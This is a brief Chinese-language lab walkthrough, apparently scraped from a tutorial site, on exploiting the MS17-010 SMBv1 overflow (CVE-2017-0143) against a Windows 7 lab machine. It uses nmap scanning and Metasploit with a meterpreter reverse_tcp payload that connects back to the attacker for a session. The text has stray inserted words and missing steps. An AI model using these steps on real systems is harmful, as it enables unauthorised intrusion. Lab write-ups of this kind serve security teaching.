MS17-010远程溢出(CVE-2017-0143)

MS17-010远程溢出(CVE-2017-0143)

原理:MS17-010漏洞出如今Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算大小错误,而致使缓冲区溢出。linux

实验环境shell

功能 属性
操做机 kali linux
IP 192.168.0.3
靶机 Windows7 SP1
IP 192.168.0.2

1.端口探测

nmap -sV -Pn 192.168.0.2

目标机开放了135 139 445 3389等端口

2.漏洞扫描

在终端输入msfconsole开启msf
搜索ms17-010漏洞相关模块
使用use命令选择咱们要使用的扫描模块

能够看到目标主机存在ms17-010漏洞,开始使用漏洞利用模块windows

选择载荷payload,也就是shellcode,此处咱们选择回连至控制端shell的payload
set payload  windows/x64/meterpreter/reverse_tcp

设置本地主机

完成配置后,运行exploit或者run开始执行漏洞利用模块tcp

成功获取来自目标主机的Session会话函数

4.远程登陆目标机

相关文章
相关标签/搜索